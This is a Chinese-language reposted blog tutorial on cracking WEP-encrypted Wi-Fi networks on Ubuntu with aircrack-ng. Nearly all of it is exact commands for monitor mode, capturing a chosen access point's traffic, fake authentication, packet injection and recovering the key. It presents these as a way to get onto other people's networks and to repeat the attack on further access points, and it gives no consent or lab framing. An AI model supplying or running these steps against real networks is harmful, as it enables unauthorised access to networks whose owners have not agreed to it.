Ubuntu下破解无线网络

转自

http://www.cnblogs.com/zero1665/archive/2010/06/10/1755915.html

 

 

一、安装ubuntu和aircrack-ng
先安装 Ubuntu，更新系统到最新
终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng
没联网的话 到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装
下载地址：http://packages.ubuntu.com/zh-cn/jaunty/i386/aircrack-ng/download

 

二、破解过程
1、启动无线网卡的监控模式，在终端中输入：sudo airmon-ng start wlan0
（wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看）

2、查看无线AP在终端中输入：
sudo airodump-ng mon0
（特别说明：启动监控模式后无线网的端口现在是 mon0 ！！！）
看看有哪些采用wep加密的AP在线，然后按 ctrl+c 退出，保留终端

3、抓包
另开一个终端，输入：
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(-c 后面跟着的6是要破解的AP工作频道，--bissid后面跟着的AP'sMAC是要欲破解AP的MAC地址，-w后面跟着wep的是抓下来的数据包DATA保存的文件名，具体情况根据步骤2里面的在线AP更改频道和MAC地址，DATA保存的文件名可随便命名）

4、与AP建立虚拟连接
再另开一个终端，输入：
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC  mon0
（-h后面跟着的My MAC是自己的无线网卡的MAC地址，命令：
iwlist wlan0 scanning
可查看自己的MAC地址；自己的MAC 地址为ifconfig命令下wlan0对应的mac地址)

5、进行注入
成功建立虚拟连接后输入：
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC  mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨！（那串ff照抄就行）

6、解密
收集有15000个以上的DATA之后，另开一个终端，输入：
sudo aircrack-ng wep*.cap
进行解密
（如果没算出来的话，继续等，aircrack-ng 会在DATA每增加多15000个之后就自动再运行，直到算出密码为至，注意此处文件的名字要与步骤3里面设置的名字一样，且*号是必需的）

7、收工
破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式，不然无线网卡会一直向刚刚的AP进行注入的，用ctrl+c退出或者直接关闭终端都是不行的。现在可以冲浪去了，或者重复步聚1-7破解其 它的AP